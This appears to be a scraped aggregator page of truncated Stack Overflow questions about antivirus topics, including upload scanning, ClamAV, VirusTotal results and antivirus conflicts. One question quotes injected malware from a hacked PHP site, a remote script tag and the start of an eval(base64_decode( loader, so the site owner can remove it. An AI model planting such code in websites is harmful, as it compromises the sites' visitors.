antivirus

Use Microsoft AntiVirus API for File Upload Scanning

自作多情 提交于 2020-01-02 10:30:11
问题 Has anyone here used Microsoft Anti-Virus API to scan file uploads using any anti-virus ? What is your experience. I want to use mcafee, trend or other well known AV to be called programatically. 回答1: It seems that Microsoft AntiVirus API is not suitable for scanning uploaded files. From http://msdn.microsoft.com/en-us/library/ms537371(VS.85).aspx The Antivirus API enables software vendors to develop applications that scan Microsoft Office 2000 documents before opening them . The API also

How can i remove an iframe virus from all of php files on my website?

↘锁芯ラ 提交于 2020-01-01 07:20:21
问题 I have a problem about removing a virus code from my php files. There are more than 1200 php files in my server and every single php file has been infected by a virus. Virus code adding this line to html output <script src="http://holasionweb.com/oo.php"></script> This is the code of virus <?php /**/ eval(base64_decode(

Antivirus (Symantec Endpoint) configuration for developer machine

故事扮演 提交于 2019-12-30 05:30:08
问题 What are your "Symantec Endpoint" configuration recommendations for a developer PC? We do java development with Eclipse, IntelliJ, Ant and Tomcat. With "Symantec Endpoint" the build and server startup are quite slow. Replacing or removing Symantec is not an option. See also https://stackoverflow.com/questions/111226/least-intrusive-antivirus-software-for-development-pc, http://www.codinghorror.com/blog/archives/000803.html and http://www.theserverside.com/news/thread.tss?thread_id=44775 回答1:

What are my options to check for viruses on a PHP upload?

荒凉一梦 提交于 2019-12-28 13:09:28
问题 I am looking to see how I can go about checking if an uploaded file has a virus or not via PHP. What options exist, pros and cons of each, etc. 回答1: ClamAV is a free anti virus commonly used on server applications. php-clamav is an extension for binding ClamAV to PHP. You can check their documentation. I've found a tutorial on how to use clamav as a Zend Framework Validator which already includes instructions on how to verify upload files. The tutorial should also help you on using it on

Postgresql 8.4 and BitDefender 11

三世轮回 提交于 2019-12-25 04:37:10
问题 Since I've change my antivirus to BitDefender 11 I cannot start Postgresql 8.4 on my desktop (command line or service alike). Browsing on the Internet is seems that is a known issue, since many people are complaining about this issue Does anyone know a workaround to this issue? Thanks Peter 回答1: As a note, this was asked on the mailing list and was responded to by Tom Lane (http://www.postgresql.org/message-id/26791.1290036551@sss.pgh.pa.us). Apparently this is cause by BitDefender

Prevent task (anti-malware program) from being ended

匆匆过客 提交于 2019-12-23 05:01:41
问题 I am currently developing a anti-virus/anti-malware program for Windows 10. I need the program to be protected; so that it may not be ended via the task manager. For example, If I were to try to end the Antimalware Service Executable with the task manager, I'd receive the following message: Unable to terminate process The operation could not be completed. Access is denied. Is there any way I could add this feature programmatically; maybe via Python? EDIT: This is for an aggressive antivirus

Scan uploaded files C# ASP.net

非 Y 不嫁゛ 提交于 2019-12-22 18:56:13
问题 I'm trying to do a virus scan on uploaded files. I have no control over the installed virus scanner, the product hosted by multiple parties with different scanners. I tried the following library but it always returns VirusNotFound on the eicar file. https://antivirusscanner.codeplex.com/ Do you know any other solutions? 回答1: ClamAV has pretty bad detection scores. VirusTotal is not on premises. I decided to create CLI wrappers for multiple scanners, nuget packages can be found here: https:/

Json parse result from virustotal api

大憨熊 提交于 2019-12-22 07:07:26
问题 I was playing around with the virustotal api today while becoming back the result in this form : { "permalink" : "http://www.virustotal.com/file-scan/report.html?id=7b6b268cbca9d421aabba5f08533d3dcaba50e0f7887b07ef2bd66bf218b35ff-1304089592", "report" : [ "2011-04-29 15:06:32", { "AVG" : "Exploit_c.TVH", "AhnLab-V3" : "PDF/Exploit", "AntiVir" : "EXP/Pidief.UK", "Antiy-AVL" : "Trojan/win32.agent", "Avast" : "JS:Pdfka-gen", "Avast5" : "JS:Pdfka-gen", "BitDefender" : "Exploit.PDF-JS.Gen", "CAT

Json parse result from virustotal api

a 夏天 提交于 2019-12-22 07:07:08
问题 I was playing around with the virustotal api today while becoming back the result in this form : { "permalink" : "http://www.virustotal.com/file-scan/report.html?id=7b6b268cbca9d421aabba5f08533d3dcaba50e0f7887b07ef2bd66bf218b35ff-1304089592", "report" : [ "2011-04-29 15:06:32", { "AVG" : "Exploit_c.TVH", "AhnLab-V3" : "PDF/Exploit", "AntiVir" : "EXP/Pidief.UK", "Antiy-AVL" : "Trojan/win32.agent", "Avast" : "JS:Pdfka-gen", "Avast5" : "JS:Pdfka-gen", "BitDefender" : "Exploit.PDF-JS.Gen", "CAT

Anti-Virus Detection on a legitimate program

若如初见. 提交于 2019-12-22 01:33:37
问题 Basically, my program runs along side another jar file. Here is the code for the download function: public void saveUrl(final String filename, final String urlString) throws MalformedURLException, IOException { BufferedInputStream in = null; FileOutputStream fout = null; try { in = new BufferedInputStream(new URL(urlString).openStream()); fout = new FileOutputStream(filename); final byte data[] = new byte[1024]; int count; while ((count = in.read(data, 0, 1024)) != -1) { fout.write(data, 0,